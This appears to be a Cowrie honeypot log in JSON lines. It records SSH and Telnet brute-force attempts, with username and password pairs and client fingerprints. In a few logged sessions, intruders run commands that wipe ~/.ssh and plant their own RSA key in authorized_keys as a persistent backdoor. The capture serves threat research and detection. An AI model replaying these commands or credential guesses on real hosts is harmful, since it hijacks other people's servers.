{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55424,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d9ce97c8231","protocol":"ssh","message":"New connection: 212.227.235.229:55424 (1.2.3.4:22) [session: 1d9ce97c8231]","sensor":"my-vps","timestamp":"2025-09-09T06:15:02.937486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:15:02.938371Z","src_ip":"212.227.235.229","session":"1d9ce97c8231"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:15:03.024232Z","src_ip":"212.227.235.229","session":"1d9ce97c8231"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:15:03.407074Z","src_ip":"212.227.235.229","session":"1d9ce97c8231"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:03.495001Z","src_ip":"212.227.235.229","session":"1d9ce97c8231"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:03.497163Z","src_ip":"212.227.235.229","session":"3f7a7ba922cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43252,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fef3b30d916","protocol":"ssh","message":"New connection: 212.227.235.229:43252 (1.2.3.4:22) [session: 8fef3b30d916]","sensor":"my-vps","timestamp":"2025-09-09T06:15:36.081129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:15:36.081919Z","src_ip":"212.227.235.229","session":"8fef3b30d916"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:15:36.329906Z","src_ip":"212.227.235.229","session":"8fef3b30d916"}
{"eventid":"cowrie.login.failed","username":"support","password":"pass","message":"login attempt [support/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T06:15:37.361339Z","src_ip":"212.227.235.229","session":"8fef3b30d916"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:38.611370Z","src_ip":"212.227.235.229","session":"8fef3b30d916"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47220,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c5bf4bd3a26","protocol":"telnet","message":"New connection: 212.227.125.160:47220 (1.2.3.4:23) [session: 2c5bf4bd3a26]","sensor":"my-vps","timestamp":"2025-09-09T06:15:43.880069Z"}
{"eventid":"cowrie.session.closed","duration":7.441666841506958,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:51.321639Z","src_ip":"212.227.125.160","session":"2c5bf4bd3a26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55830,"dst_ip":"1.2.3.4","dst_port":22,"session":"90070d24e868","protocol":"ssh","message":"New connection: 212.227.235.229:55830 (1.2.3.4:22) [session: 90070d24e868]","sensor":"my-vps","timestamp":"2025-09-09T06:15:57.283930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:15:57.284708Z","src_ip":"212.227.235.229","session":"90070d24e868"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:15:57.467386Z","src_ip":"212.227.235.229","session":"90070d24e868"}
{"eventid":"cowrie.login.failed","username":"vpnuser","password":"password","message":"login attempt [vpnuser/password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:15:58.234488Z","src_ip":"212.227.235.229","session":"90070d24e868"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:15:59.420155Z","src_ip":"212.227.235.229","session":"90070d24e868"}
{"eventid":"cowrie.session.connect","src_ip":"193.163.201.206","src_port":43858,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb0bb29207e0","protocol":"ssh","message":"New connection: 193.163.201.206:43858 (1.2.3.4:22) [session: bb0bb29207e0]","sensor":"my-vps","timestamp":"2025-09-09T06:16:48.699975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:16:48.700761Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:16:48.743148Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin123$","message":"login attempt [root/Admin123$] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:16:48.956353Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:16:49.061277Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.062126Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.063331Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.107400Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:16:49.311993Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.312668Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.357184Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.358565Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.session.connect","src_ip":"193.163.201.206","src_port":43874,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ed8c657b8f4","protocol":"ssh","message":"New connection: 193.163.201.206:43874 (1.2.3.4:22) [session: 5ed8c657b8f4]","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.402045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.402866Z","src_ip":"193.163.201.206","session":"5ed8c657b8f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.448307Z","src_ip":"193.163.201.206","session":"5ed8c657b8f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:16:49.671101Z","src_ip":"193.163.201.206","session":"5ed8c657b8f4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:16:50.718880Z","src_ip":"193.163.201.206","session":"5ed8c657b8f4"}
{"eventid":"cowrie.session.connect","src_ip":"193.163.201.206","src_port":43878,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce70a1e27e61","protocol":"ssh","message":"New connection: 193.163.201.206:43878 (1.2.3.4:22) [session: ce70a1e27e61]","sensor":"my-vps","timestamp":"2025-09-09T06:16:50.761550Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:16:50.762393Z","src_ip":"193.163.201.206","session":"ce70a1e27e61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:16:50.806566Z","src_ip":"193.163.201.206","session":"ce70a1e27e61"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:16:51.022776Z","src_ip":"193.163.201.206","session":"ce70a1e27e61"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:16:51.069145Z","src_ip":"193.163.201.206","session":"bb0bb29207e0"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:16:51.070115Z","src_ip":"193.163.201.206","session":"ce70a1e27e61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39829,"dst_ip":"1.2.3.4","dst_port":22,"session":"68ec759a973e","protocol":"ssh","message":"New connection: 212.227.235.229:39829 (1.2.3.4:22) [session: 68ec759a973e]","sensor":"my-vps","timestamp":"2025-09-09T06:17:06.452875Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:17:06.453945Z","src_ip":"212.227.235.229","session":"68ec759a973e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:17:06.539231Z","src_ip":"212.227.235.229","session":"68ec759a973e"}
{"eventid":"cowrie.login.failed","username":"app","password":"1q2w3e4r","message":"login attempt [app/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-09T06:17:06.923744Z","src_ip":"212.227.235.229","session":"68ec759a973e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:08.011132Z","src_ip":"212.227.235.229","session":"68ec759a973e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40830,"dst_ip":"1.2.3.4","dst_port":22,"session":"09c1afe50159","protocol":"ssh","message":"New connection: 212.227.235.229:40830 (1.2.3.4:22) [session: 09c1afe50159]","sensor":"my-vps","timestamp":"2025-09-09T06:17:08.680220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:17:08.680943Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:17:08.923571Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx#edc","message":"login attempt [root/1qaz2wsx#edc] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:17:09.937279Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:17:10.499813Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:17:10.500536Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:17:10.501581Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:17:10.987357Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:17:11.248161Z","src_ip":"212.227.235.229","session":"09c1afe50159"}
